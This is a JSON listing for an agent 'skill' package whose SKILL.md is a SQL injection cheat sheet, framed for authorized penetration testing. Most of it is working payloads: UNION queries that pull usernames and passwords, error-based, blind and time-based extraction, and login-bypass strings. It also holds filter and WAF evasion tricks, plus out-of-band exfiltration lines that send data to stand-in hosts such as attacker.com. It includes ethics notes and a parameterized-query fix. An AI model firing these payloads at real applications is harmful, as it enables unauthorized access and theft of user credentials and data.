{
  "schemaVersion": "1.0",
  "item": {
    "slug": "sql-injection-testing",
    "name": "SQL Injection Testing",
    "source": "tencent",
    "type": "skill",
    "category": "开发工具",
    "sourceUrl": "https://clawhub.ai/brandonwise/sql-injection-testing",
    "canonicalUrl": "https://clawhub.ai/brandonwise/sql-injection-testing",
    "targetPlatform": "OpenClaw"
  },
  "install": {
    "downloadMode": "redirect",
    "downloadUrl": "/downloads/sql-injection-testing",
    "sourceDownloadUrl": "https://wry-manatee-359.convex.site/api/v1/download?slug=sql-injection-testing",
    "sourcePlatform": "tencent",
    "targetPlatform": "OpenClaw",
    "installMethod": "Manual import",
    "extraction": "Extract archive",
    "prerequisites": [
      "OpenClaw"
    ],
    "packageFormat": "ZIP package",
    "includedAssets": [
      "SKILL.md"
    ],
    "primaryDoc": "SKILL.md",
    "quickSetup": [
      "Download the package from Yavira.",
      "Extract the archive and review SKILL.md first.",
      "Import or place the package into your OpenClaw setup."
    ],
    "agentAssist": {
      "summary": "Hand the extracted package to your coding agent with a concrete install brief instead of figuring it out manually.",
      "steps": [
        "Download the package from Yavira.",
        "Extract it into a folder your agent can access.",
        "Paste one of the prompts below and point your agent at the extracted folder."
      ],
      "prompts": [
        {
          "label": "New install",
          "body": "I downloaded a skill package from Yavira. Read SKILL.md from the extracted folder and install it by following the included instructions. Tell me what you changed and call out any manual steps you could not complete."
        },
        {
          "label": "Upgrade existing",
          "body": "I downloaded an updated skill package from Yavira. Read SKILL.md from the extracted folder, compare it with my current installation, and upgrade it while preserving any custom configuration unless the package docs explicitly say otherwise. Summarize what changed and any follow-up checks I should run."
        }
      ]
    },
    "sourceHealth": {
      "source": "tencent",
      "slug": "sql-injection-testing",
      "status": "healthy",
      "reason": "direct_download_ok",
      "recommendedAction": "download",
      "checkedAt": "2026-05-08T09:18:41.984Z",
      "expiresAt": "2026-05-15T09:18:41.984Z",
      "httpStatus": 200,
      "finalUrl": "https://wry-manatee-359.convex.site/api/v1/download?slug=sql-injection-testing",
      "contentType": "application/zip",
      "probeMethod": "head",
      "details": {
        "probeUrl": "https://wry-manatee-359.convex.site/api/v1/download?slug=sql-injection-testing",
        "contentDisposition": "attachment; filename=\"sql-injection-testing-1.0.0.zip\"",
        "redirectLocation": null,
        "bodySnippet": null,
        "slug": "sql-injection-testing"
      },
      "scope": "item",
      "summary": "Item download looks usable.",
      "detail": "Yavira can redirect you to the upstream package for this item.",
      "primaryActionLabel": "Download for OpenClaw",
      "primaryActionHref": "/downloads/sql-injection-testing"
    },
    "validation": {
      "installChecklist": [
        "Use the Yavira download entry.",
        "Review SKILL.md after the package is downloaded.",
        "Confirm the extracted package contains the expected setup assets."
      ],
      "postInstallChecks": [
        "Confirm the extracted package includes the expected docs or setup files.",
        "Validate the skill or prompts are available in your target agent workspace.",
        "Capture any manual follow-up steps the agent could not complete."
      ]
    },
    "downloadPageUrl": "https://openagent3.xyz/downloads/sql-injection-testing",
    "agentPageUrl": "https://openagent3.xyz/skills/sql-injection-testing/agent",
    "manifestUrl": "https://openagent3.xyz/skills/sql-injection-testing/agent.json",
    "briefUrl": "https://openagent3.xyz/skills/sql-injection-testing/agent.md"
  },
  "agentAssist": {
    "summary": "Hand the extracted package to your coding agent with a concrete install brief instead of figuring it out manually.",
    "steps": [
      "Download the package from Yavira.",
      "Extract it into a folder your agent can access.",
      "Paste one of the prompts below and point your agent at the extracted folder."
    ],
    "prompts": [
      {
        "label": "New install",
        "body": "I downloaded a skill package from Yavira. Read SKILL.md from the extracted folder and install it by following the included instructions. Tell me what you changed and call out any manual steps you could not complete."
      },
      {
        "label": "Upgrade existing",
        "body": "I downloaded an updated skill package from Yavira. Read SKILL.md from the extracted folder, compare it with my current installation, and upgrade it while preserving any custom configuration unless the package docs explicitly say otherwise. Summarize what changed and any follow-up checks I should run."
      }
    ]
  },
  "documentation": {
    "source": "clawhub",
    "primaryDoc": "SKILL.md",
    "sections": [
      {
        "title": "SQL Injection Testing",
        "body": "Comprehensive SQL injection vulnerability assessment techniques for web applications, covering detection, exploitation, and defense validation."
      },
      {
        "title": "Description",
        "body": "USE WHEN:\n\nTesting for SQL injection vulnerabilities\nPerforming authorized penetration tests\nValidating input sanitization mechanisms\nBypassing authentication for security testing\nExtracting database information (authorized)\nLearning SQL injection defense\n\nDON'T USE WHEN:\n\nNo written authorization for testing\nTesting production systems with real user data\nIntent is malicious (don't be evil)\n\n⚠️ LEGAL REQUIREMENT: Written penetration testing authorization required before use."
      },
      {
        "title": "Injection Point Identification",
        "body": "Common injectable parameters:\n\nURL params:    ?id=1, ?user=admin, ?category=books\nForm fields:   username, password, search, comments\nCookies:       session_id, user_preference\nHTTP headers:  User-Agent, Referer, X-Forwarded-For"
      },
      {
        "title": "Basic Vulnerability Tests",
        "body": "-- Single quote test\n'\n\n-- Double quote test\n\"\n\n-- Comment sequences\n--\n#\n/**/\n\n-- Semicolon for query stacking\n;\n\nWatch for:\n\nDatabase error messages\nHTTP 500 errors\nModified response content/length\nUnexpected behavior changes"
      },
      {
        "title": "Boolean Logic Tests",
        "body": "-- True condition (should return data)\npage.asp?id=1 or 1=1\npage.asp?id=1' or 1=1--\npage.asp?id=1\" or 1=1--\n\n-- False condition (should return nothing/error)\npage.asp?id=1 and 1=2\npage.asp?id=1' and 1=2--\n\nCompare responses between true/false to confirm injection."
      },
      {
        "title": "UNION-Based Extraction",
        "body": "-- Step 1: Determine column count\nORDER BY 1--\nORDER BY 2--\nORDER BY 3--\n-- Continue until error occurs\n\n-- Step 2: Find displayable columns\nUNION SELECT NULL,NULL,NULL--\nUNION SELECT 'a',NULL,NULL--\nUNION SELECT NULL,'a',NULL--\n\n-- Step 3: Extract data\nUNION SELECT username,password,NULL FROM users--\nUNION SELECT table_name,NULL,NULL FROM information_schema.tables--\nUNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'--"
      },
      {
        "title": "Error-Based Extraction",
        "body": "-- MSSQL\n1' AND 1=CONVERT(int,(SELECT @@version))--\n\n-- MySQL (XPATH)\n1' AND extractvalue(1,concat(0x7e,(SELECT @@version)))--\n\n-- PostgreSQL\n1' AND 1=CAST((SELECT version()) AS int)--"
      },
      {
        "title": "Blind Boolean-Based",
        "body": "-- Character extraction\n1' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='a'--\n1' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='b'--\n\n-- Conditional responses\n1' AND (SELECT COUNT(*) FROM users WHERE username='admin')>0--"
      },
      {
        "title": "Time-Based Blind",
        "body": "-- MySQL\n1' AND IF(1=1,SLEEP(5),0)--\n1' AND IF((SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a',SLEEP(5),0)--\n\n-- MSSQL\n1'; WAITFOR DELAY '0:0:5'--\n\n-- PostgreSQL\n1'; SELECT pg_sleep(5)--"
      },
      {
        "title": "Out-of-Band (OOB)",
        "body": "-- MSSQL DNS exfiltration\n1; EXEC master..xp_dirtree '\\\\attacker-server.com\\share'--\n\n-- MySQL DNS\n1' UNION SELECT LOAD_FILE(CONCAT('\\\\\\\\',@@version,'.attacker.com\\\\a'))--\n\n-- Oracle HTTP\n1' UNION SELECT UTL_HTTP.REQUEST('http://attacker.com/'||(SELECT user FROM dual)) FROM dual--"
      },
      {
        "title": "Authentication Bypass",
        "body": "-- Classic bypass payloads\nadmin'--\nadmin'/*\n' OR '1'='1\n' OR '1'='1'--\n' OR '1'='1'/*\n') OR ('1'='1\n') OR ('1'='1'--\n\n-- Query transformation example\n-- Original: SELECT * FROM users WHERE username='input' AND password='input'\n-- Injected (username: admin'--):\n-- SELECT * FROM users WHERE username='admin'--' AND password='anything'\n-- Password check bypassed!"
      },
      {
        "title": "Character Encoding",
        "body": "-- URL encoding\n%27 (single quote)\n%22 (double quote)\n%23 (hash)\n\n-- Double URL encoding\n%2527 (single quote)\n\n-- Hex strings (MySQL)\nSELECT * FROM users WHERE name=0x61646D696E  -- 'admin'"
      },
      {
        "title": "Whitespace Alternatives",
        "body": "-- Comment substitution\nSELECT/**/username/**/FROM/**/users\n\n-- Tab character\nSELECT%09username%09FROM%09users\n\n-- Newline\nSELECT%0Ausername%0AFROM%0Ausers"
      },
      {
        "title": "Keyword Evasion",
        "body": "-- Case variation\nSeLeCt, sElEcT, SELECT\n\n-- Inline comments\nSEL/*bypass*/ECT\nUN/*bypass*/ION\n\n-- Double writing (if filter removes once)\nSELSELECTECT → SELECT\nUNUNIONION → UNION"
      },
      {
        "title": "Database Fingerprinting",
        "body": "Database\tVersion Query\nMySQL\tSELECT @@version or SELECT version()\nMSSQL\tSELECT @@version\nPostgreSQL\tSELECT version()\nOracle\tSELECT banner FROM v$version\nSQLite\tSELECT sqlite_version()"
      },
      {
        "title": "Information Schema Queries",
        "body": "-- MySQL/MSSQL: List tables\nSELECT table_name FROM information_schema.tables WHERE table_schema=database()\n\n-- List columns\nSELECT column_name FROM information_schema.columns WHERE table_name='users'\n\n-- Oracle equivalent\nSELECT table_name FROM all_tables\nSELECT column_name FROM all_tab_columns WHERE table_name='USERS'"
      },
      {
        "title": "Quick Reference",
        "body": "Purpose\tPayload\nBasic test\t' or \"\nBoolean true\tOR 1=1--\nBoolean false\tAND 1=2--\nComment (MySQL)\t# or --\nComment (MSSQL)\t--\nUNION probe\tUNION SELECT NULL--\nTime delay\tAND SLEEP(5)--\nAuth bypass\t' OR '1'='1"
      },
      {
        "title": "Detection Test Sequence",
        "body": "1. Insert ' → Check for error\n2. Insert \" → Check for error\n3. Try: OR 1=1-- → Check for behavior change\n4. Try: AND 1=2-- → Check for behavior change\n5. Try: ' WAITFOR DELAY '0:0:5'-- → Check for delay"
      },
      {
        "title": "❌ Vulnerable",
        "body": "const query = `SELECT * FROM users WHERE id = '${userId}'`;"
      },
      {
        "title": "✅ Safe",
        "body": "// Parameterized query\nconst query = 'SELECT * FROM users WHERE id = $1';\nconst result = await db.query(query, [userId]);\n\n// OR use ORM\nconst user = await prisma.user.findUnique({ where: { id: userId } });"
      },
      {
        "title": "Tools",
        "body": "SQLMap: Automated SQL injection\nBurp Suite: Request manipulation\nOWASP ZAP: Web app scanner\nHavij: SQL injection tool"
      },
      {
        "title": "Troubleshooting",
        "body": "Problem\tSolution\nNo error messages\tUse blind injection (boolean/time-based)\nUNION fails\tCheck column count with ORDER BY\nWAF blocking\tUse encoding/evasion techniques\nPayload not executing\tVerify correct comment syntax for DB type\nTime-based inconsistent\tUse longer delays (10+ seconds)"
      },
      {
        "title": "Ethical Guidelines",
        "body": "Never execute destructive queries (DROP, DELETE) without explicit authorization\nLimit data extraction to proof-of-concept quantities\nStop immediately upon detecting production data\nReport critical vulnerabilities through agreed channels\nDocument all activities for audit trail"
      }
    ],
    "body": "SQL Injection Testing\n\nComprehensive SQL injection vulnerability assessment techniques for web applications, covering detection, exploitation, and defense validation.\n\nDescription\n\nUSE WHEN:\n\nTesting for SQL injection vulnerabilities\nPerforming authorized penetration tests\nValidating input sanitization mechanisms\nBypassing authentication for security testing\nExtracting database information (authorized)\nLearning SQL injection defense\n\nDON'T USE WHEN:\n\nNo written authorization for testing\nTesting production systems with real user data\nIntent is malicious (don't be evil)\n\n⚠️ LEGAL REQUIREMENT: Written penetration testing authorization required before use.\n\nDetection Phase\nInjection Point Identification\n\nCommon injectable parameters:\n\nURL params:    ?id=1, ?user=admin, ?category=books\nForm fields:   username, password, search, comments\nCookies:       session_id, user_preference\nHTTP headers:  User-Agent, Referer, X-Forwarded-For\n\nBasic Vulnerability Tests\n-- Single quote test\n'\n\n-- Double quote test\n\"\n\n-- Comment sequences\n--\n#\n/**/\n\n-- Semicolon for query stacking\n;\n\n\nWatch for:\n\nDatabase error messages\nHTTP 500 errors\nModified response content/length\nUnexpected behavior changes\nBoolean Logic Tests\n-- True condition (should return data)\npage.asp?id=1 or 1=1\npage.asp?id=1' or 1=1--\npage.asp?id=1\" or 1=1--\n\n-- False condition (should return nothing/error)\npage.asp?id=1 and 1=2\npage.asp?id=1' and 1=2--\n\n\nCompare responses between true/false to confirm injection.\n\nExploitation Techniques\nUNION-Based Extraction\n-- Step 1: Determine column count\nORDER BY 1--\nORDER BY 2--\nORDER BY 3--\n-- Continue until error occurs\n\n-- Step 2: Find displayable columns\nUNION SELECT NULL,NULL,NULL--\nUNION SELECT 'a',NULL,NULL--\nUNION SELECT NULL,'a',NULL--\n\n-- Step 3: Extract data\nUNION SELECT username,password,NULL FROM users--\nUNION SELECT table_name,NULL,NULL FROM 
information_schema.tables--\nUNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'--\n\nError-Based Extraction\n-- MSSQL\n1' AND 1=CONVERT(int,(SELECT @@version))--\n\n-- MySQL (XPATH)\n1' AND extractvalue(1,concat(0x7e,(SELECT @@version)))--\n\n-- PostgreSQL\n1' AND 1=CAST((SELECT version()) AS int)--\n\nBlind Boolean-Based\n-- Character extraction\n1' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='a'--\n1' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='b'--\n\n-- Conditional responses\n1' AND (SELECT COUNT(*) FROM users WHERE username='admin')>0--\n\nTime-Based Blind\n-- MySQL\n1' AND IF(1=1,SLEEP(5),0)--\n1' AND IF((SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a',SLEEP(5),0)--\n\n-- MSSQL\n1'; WAITFOR DELAY '0:0:5'--\n\n-- PostgreSQL\n1'; SELECT pg_sleep(5)--\n\nOut-of-Band (OOB)\n-- MSSQL DNS exfiltration\n1; EXEC master..xp_dirtree '\\\\attacker-server.com\\share'--\n\n-- MySQL DNS\n1' UNION SELECT LOAD_FILE(CONCAT('\\\\\\\\',@@version,'.attacker.com\\\\a'))--\n\n-- Oracle HTTP\n1' UNION SELECT UTL_HTTP.REQUEST('http://attacker.com/'||(SELECT user FROM dual)) FROM dual--\n\nAuthentication Bypass\n-- Classic bypass payloads\nadmin'--\nadmin'/*\n' OR '1'='1\n' OR '1'='1'--\n' OR '1'='1'/*\n') OR ('1'='1\n') OR ('1'='1'--\n\n-- Query transformation example\n-- Original: SELECT * FROM users WHERE username='input' AND password='input'\n-- Injected (username: admin'--):\n-- SELECT * FROM users WHERE username='admin'--' AND password='anything'\n-- Password check bypassed!\n\nFilter Bypass Techniques\nCharacter Encoding\n-- URL encoding\n%27 (single quote)\n%22 (double quote)\n%23 (hash)\n\n-- Double URL encoding\n%2527 (single quote)\n\n-- Hex strings (MySQL)\nSELECT * FROM users WHERE name=0x61646D696E  -- 'admin'\n\nWhitespace Alternatives\n-- Comment substitution\nSELECT/**/username/**/FROM/**/users\n\n-- Tab character\nSELECT%09username%09FROM%09users\n\n-- 
Newline\nSELECT%0Ausername%0AFROM%0Ausers\n\nKeyword Evasion\n-- Case variation\nSeLeCt, sElEcT, SELECT\n\n-- Inline comments\nSEL/*bypass*/ECT\nUN/*bypass*/ION\n\n-- Double writing (if filter removes once)\nSELSELECTECT → SELECT\nUNUNIONION → UNION\n\nDatabase Fingerprinting\nDatabase\tVersion Query\nMySQL\tSELECT @@version or SELECT version()\nMSSQL\tSELECT @@version\nPostgreSQL\tSELECT version()\nOracle\tSELECT banner FROM v$version\nSQLite\tSELECT sqlite_version()\nInformation Schema Queries\n-- MySQL/MSSQL: List tables\nSELECT table_name FROM information_schema.tables WHERE table_schema=database()\n\n-- List columns\nSELECT column_name FROM information_schema.columns WHERE table_name='users'\n\n-- Oracle equivalent\nSELECT table_name FROM all_tables\nSELECT column_name FROM all_tab_columns WHERE table_name='USERS'\n\nQuick Reference\nPurpose\tPayload\nBasic test\t' or \"\nBoolean true\tOR 1=1--\nBoolean false\tAND 1=2--\nComment (MySQL)\t# or --\nComment (MSSQL)\t--\nUNION probe\tUNION SELECT NULL--\nTime delay\tAND SLEEP(5)--\nAuth bypass\t' OR '1'='1\nDetection Test Sequence\n1. Insert ' → Check for error\n2. Insert \" → Check for error\n3. Try: OR 1=1-- → Check for behavior change\n4. Try: AND 1=2-- → Check for behavior change\n5. 
Try: ' WAITFOR DELAY '0:0:5'-- → Check for delay\n\nPrevention (What to Look For in Code Review)\n❌ Vulnerable\nconst query = `SELECT * FROM users WHERE id = '${userId}'`;\n\n✅ Safe\n// Parameterized query\nconst query = 'SELECT * FROM users WHERE id = $1';\nconst result = await db.query(query, [userId]);\n\n// OR use ORM\nconst user = await prisma.user.findUnique({ where: { id: userId } });\n\nTools\nSQLMap: Automated SQL injection\nBurp Suite: Request manipulation\nOWASP ZAP: Web app scanner\nHavij: SQL injection tool\nTroubleshooting\nProblem\tSolution\nNo error messages\tUse blind injection (boolean/time-based)\nUNION fails\tCheck column count with ORDER BY\nWAF blocking\tUse encoding/evasion techniques\nPayload not executing\tVerify correct comment syntax for DB type\nTime-based inconsistent\tUse longer delays (10+ seconds)\nEthical Guidelines\nNever execute destructive queries (DROP, DELETE) without explicit authorization\nLimit data extraction to proof-of-concept quantities\nStop immediately upon detecting production data\nReport critical vulnerabilities through agreed channels\nDocument all activities for audit trail"
  },
  "trust": {
    "sourceLabel": "tencent",
    "provenanceUrl": "https://clawhub.ai/brandonwise/sql-injection-testing",
    "publisherUrl": "https://clawhub.ai/brandonwise/sql-injection-testing",
    "owner": "brandonwise",
    "version": "1.0.0",
    "license": null,
    "verificationStatus": "Indexed source record"
  },
  "links": {
    "detailUrl": "https://openagent3.xyz/skills/sql-injection-testing",
    "downloadUrl": "https://openagent3.xyz/downloads/sql-injection-testing",
    "agentUrl": "https://openagent3.xyz/skills/sql-injection-testing/agent",
    "manifestUrl": "https://openagent3.xyz/skills/sql-injection-testing/agent.json",
    "briefUrl": "https://openagent3.xyz/skills/sql-injection-testing/agent.md"
  }
}